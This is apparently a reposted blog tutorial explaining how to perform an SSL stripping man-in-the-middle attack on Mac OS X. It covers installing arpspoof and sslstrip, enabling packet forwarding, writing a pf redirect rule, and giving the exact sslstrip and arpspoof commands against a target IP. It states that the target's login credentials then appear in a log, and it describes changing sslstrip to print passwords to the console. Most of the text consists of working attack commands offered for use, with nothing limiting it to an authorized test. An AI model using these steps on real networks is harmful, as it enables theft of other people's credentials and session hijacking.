SSL Strip on Mac OS X

First, we need to install the tools required, which are arpspoof and sslstrip. arpspoof comes with the dsniff suite and you can try to compile dsniff manually but I used macports to do it. Here are the steps I took :-

Installing arpspoof




    Make sure Xcode is installed. You can do this from the App Store.
  1. Make sure that Command Line Tools are installed.


  2. Download the installation package from macports here.
  3. Install it by opening and following through the installation. Straightforward.
  4. Open up a Terminal window.
  5. Do an update, by typing sudo port -d selfupdate
  6. Install dsniff, by typing sudo port install dsniff. The command should take a while but fail eventually. (may have changed, if it doesn't fail, skip to step 10.)
  7. One of the dependancies for dsniff is libnids. And one of the dependancies of libnids is libnet. It turns out that the default variant is libnids +libnet11, which will not work. So we need to uninstall libnids, and install the other variant. Do this with 

    • sudo port uninstall libnids
    • sudo port install libnids +libnet

  8. Try sudo port install dsniff again. It should work this time.
  9. arpspoof should have been installed. You can test it out from the Terminal window by typing arpspoof -h.

Installing sslstrip

  1. We need some python packages that are needed by sslstrip. Install them by typing this in a Terminal window

    • sudo port install python27 (optional?)
    • sudo port install py27-openssl
    • sudo port install py27-twisted-web2
    • sudo port install python_select (optional?)

  2. Download sslstrip. I used the 0.9-2 version.
  3. Decompress the archive.
  4. sslstrip should now be working from the decompressed archive. You can test it out from the Terminal window by typing python sslstrip.py -h from the sslstrip-0.9.2 folder.

Getting ready to run

  1. Run the following commands. They allow you to use your mac to forward any incoming ip packets.

    • sudo sysctl -w net.inet.ip.forwarding=1
    • sudo sysctl -w net.inet.ip.fw.enable=1
    • sudo sysctl -w net.inet.ip.fw.verbose=1 (optional?)

  2. At this point, you can choose to modify sslstripI preferred a cleaner output so I added in a try-catch at the following lines in the ServerConnection.py file.

    3.             try:
                    HTTPClient.handleResponseEnd(self)
                except:
                    pass

    I also made some other changes. In particular, I made the log level to be debug mode, so I can see them from the log file generated, if I need to. Important data I made to print out from the console, such as urls, logins, and passwords.
  3. We need to do port redirection of traffic. The usual packet firewall ipfw did not work - it was slated to be deprecated in Mountain Lion. Instead I used pf (for Packet Filter) instead. Make a backup of the file /etc/pf.conf, and save it somewhere, e.g. pf_mod.conf.
  4. Specifically, we want to redirect all http traffic to our localhost at a specified port, say 8080. Insert the following line in the beginning of the file. This line says to redirect all incoming traffic from the interface en1, with any source and any destination address, but port 80 to localhost (127.0.0.1) on port 8080. Assuming en1 is the interface name you are using.

    5. rdr pass on en1 proto tcp from any to any port 80 -> 127.0.0.1 port 8080

  5. Run  sudo pfctl -e -f pf_mod.conf. This command enables the packet filter and to take its rules from the pf_mod.conf file.
    (To disable after you're done, simply do the same command with the backup file that you copied in step 3. You may also want to type     sudo pfctl -d to disable the packet filter, if it was disabled in the first place.)
  6. Start sslstrip by typing python sslstrip.py -p -k -l 8080 -w ./sslstrip.log.  Here, we are specifying that we only want to see secure post data, kill sessions, to listen at port 8080, and all output to be written to the file sslstrip.log. If run sucessfully, it should say that it is running.
  7. Choose a target IP address, say 192.168.1.20. You can find this out using nmap. Also, find out now where your router is, say 192.168.1.1. You can find this out using netstat -rn, and looking at the default gateway. Now type in the following command in a new Terminal window.

    8. arpspoof -i en1 -t 192.168.1.20 192.168.1.1

  8. You should be getting your credentials in your sslstrip.log file, when the target logins to a secure website.
Credits to Moxie for sslstrip and Dug Song for arpspoof.

via: techjots.blogspot.com
Κατηγορίες:
Σχόλια